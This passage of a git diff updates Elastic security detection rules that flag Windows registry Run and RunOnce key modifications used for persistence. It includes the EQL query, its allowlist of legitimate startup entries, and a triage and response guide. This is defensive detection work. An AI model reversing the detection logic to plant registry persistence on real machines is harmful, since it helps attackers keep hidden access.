\"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : \"Slack Technologies, Inc.\" and\n process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name : (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json index 6aa2441dc00..87599098d52 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_108.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe --processStart \\\"Teams.exe\\\" --process-start-args \\\"--system-initiated\\\"\"\n ) or\n\n process.name : \"OneDriveStandaloneUpdater.exe\" and registry.data.strings : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\\Microsoft.SharePoint.exe\"\n ) or\n\n process.name : \"OneDriveSetup.exe\" and\n registry.value : (\n \"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\", \"i386\", \"OneDrive\"\n ) and\n registry.data.strings : (\n \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * \\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\",\n \"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\",\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft OneDrive\\\\OneDrive.exe\\\" /background *\",\n \"?:\\\\Program Files\\\\Microsoft OneDrive\\\\OneDrive.exe /background *\"\n )\n )\n ) or\n\n /* Slack */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\", \"Slack Technologies, LLC\"\n ) and process.name : \"slack.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\slack\\\\slack.exe\\\" --process-start-args --startup\"\n )\n ) or\n\n /* WebEx */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and\n process.name : \"WebexHost.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe\\\" /daemon /runFrom=autorun\"\n )\n )\n )\n", "related_integrations": [ { @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json index 7804efd5bc4..1dc61a55a28 100644 --- a/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json +++ b/packages/security_detection_engine/kibana/security_rule/97fc44d3-8dae-4019-ae83-298c3015600f_109.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup or Run Key Registry Modification", - "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Startup or Run Key Registry Modification\n\nAdversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will executed under the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to registry run keys. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n- Startup Folder Persistence via Unsigned Process - 2fba96c0-ade5-4bce-b92f-a5df2509da3f\n- Startup Persistence by a Suspicious Process - 440e2db4-bc7f-4c96-a068-65b78da59bde\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and registry.data.strings != null and\n registry.path : (\n /* Machine Hive */\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\",\n /* Users Hive */\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnceEx\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\*\"\n ) and\n /* add common legitimate changes without being too restrictive as this is one of the most abused AESPs */\n not registry.data.strings : \"ctfmon.exe /n\" and\n not (registry.value : \"Application Restart #*\" and process.name : \"csrss.exe\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not registry.data.strings : (\"?:\\\\Program Files\\\\*.exe\", \"?:\\\\Program Files (x86)\\\\*.exe\") and\n not process.executable : (\"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (\n /* Logitech G Hub */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Logitech Inc\" and\n process.name : \"lghub_agent.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\LGHUB\\\\lghub.exe\\\" --background\"\n )\n ) or\n\n /* Google Drive File Stream, Chrome, and Google Update */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name == \"Google LLC\" and\n (\n process.name : \"GoogleDriveFS.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Drive File Stream\\\\*\\\\GoogleDriveFS.exe\\\" --startup_mode\"\n ) or\n\n process.name : \"chrome.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\",\n \"\\\"?:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\" --no-startup-window /prefetch:5\"\n ) or\n\n process.name : \"GoogleUpdate.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Update\\\\*\\\\GoogleUpdateCore.exe\\\"\"\n )\n )\n ) or\n\n /* MS Programs */\n (\n process.code_signature.trusted == true and process.code_signature.subject_name in (\"Microsoft Windows\", \"Microsoft Corporation\") and\n (\n process.name : \"msedge.exe\" and registry.data.strings : (\n \"\\\"?:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\" --no-startup-window --win-session-start /prefetch:5\"\n ) or\n\n process.name : (\"Update.exe\", \"Teams.exe\") and registry.data.strings : (\n 